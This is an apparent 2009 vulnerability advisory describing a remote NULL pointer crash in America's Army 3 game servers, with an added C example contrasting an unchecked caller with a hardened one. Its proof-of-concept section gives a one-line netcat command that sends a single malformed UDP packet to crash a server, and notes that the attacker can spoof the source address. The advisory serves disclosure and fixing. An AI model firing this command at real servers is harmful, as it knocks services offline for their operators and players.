America's Army 3 versions 3.0.4 and below suffer from a null pointer vulnerability.
#######################################################################
Luigi Auriemma
Application: America's Army 3
http://www.americasarmy.com/aa3.php
Versions: <= 3.0.4
Platforms: Windows
Bug: NULL pointer
Exploitation: remote, versus server
Date: 06 Jul 2009
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
America's Army 3 (AA3) is the new free game of the AA series, developed
for the U.S. Army as an aid to military recruitment.
Released about 20 days ago, it is already played by thousands of players
on more than 400 online servers
(http://login.aa3.americasarmy.com/servers).
#######################################################################
======
2) Bug
======
Unlike the older versions, AA3 has introduced a new proprietary type of
query used for retrieving information from the servers.
The reply received from the servers is compressed and contains a lot of
information (including the IP addresses of the clients... mah).
The job of parsing such a query is performed by the acpu_decompile
function in libaa3.dll, which returns a pointer to a newly allocated
structure that is then used internally by the game.
Using an invalid type of query (for example one which doesn't start
with the 0x6fe1 value) it is possible to force this function to fail, so
that it returns a NULL pointer instead of the pointer to the new data;
because the caller performs no check on the result, the entire server
crashes.
Only one single UDP packet is needed to exploit the vulnerability, so
there are no limitations and the attacker can spoof their own IP
address.
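The failure mode described above, as an added example that is not code from the advisory or from libaa3.dll: parse_query() stands in for acpu_decompile() and returns NULL on a datagram that does not start with 0x6fe1, and the two callers show the unchecked dereference that kills the server next to the check that makes it drop the packet instead. The function and struct names, the struct layout and the little-endian byte order of the marker are assumptions.

```c
/* Added example, not code from the advisory or libaa3.dll: a model of the bug above.
 * parse_query() stands in for acpu_decompile() and returns NULL when the datagram
 * does not start with 0x6fe1. Names, struct layout and byte order are assumptions. */
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

#define AA3_QUERY_MAGIC 0x6fe1u   /* marker named in the advisory, read little-endian (assumed) */
typedef struct {                  /* hypothetical stand-in for the real parsed structure */
    size_t payload_len;
} aa3_query_t;

/* Returns a newly allocated structure, or NULL when the query is malformed. */
aa3_query_t *parse_query(const uint8_t *buf, size_t len)
{
    if (buf == NULL || len < 2)
        return NULL;
    uint16_t magic = (uint16_t)(buf[0] | (buf[1] << 8));
    if (magic != AA3_QUERY_MAGIC)
        return NULL;              /* invalid query type: fail like acpu_decompile */
    aa3_query_t *q = malloc(sizeof *q);
    if (q == NULL)
        return NULL;
    q->payload_len = len - 2;
    return q;
}

/* Vulnerable pattern: the caller trusts the pointer and dereferences it at once.
 * One "blah" datagram makes this read address 0 and takes the whole server down. */
size_t handle_query_unchecked(const uint8_t *buf, size_t len)
{
    aa3_query_t *q = parse_query(buf, len);
    size_t n = q->payload_len;    /* NULL dereference on any malformed packet */
    free(q);
    return n;
}

/* Hardened pattern: a NULL result is a protocol error, so drop the datagram and go on. */
int handle_query_checked(const uint8_t *buf, size_t len, size_t *payload_len)
{
    aa3_query_t *q = parse_query(buf, len);
    if (q == NULL)
        return -1;                /* malformed query: drop it, the server keeps running */
    *payload_len = q->payload_len;
    free(q);
    return 0;
}
```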
#######################################################################
===========
3) The Code
===========
echo blah | nc SERVER 39300 -v -v -u
note: instead the LAN servers use port 9002
#######################################################################
======
4) Fix
======
No fix.
I have released an unofficial fix for the latest known server version
available at the moment I'm writing:
http://aluigi.org/patches/aa3blahfix.lpatch
#######################################################################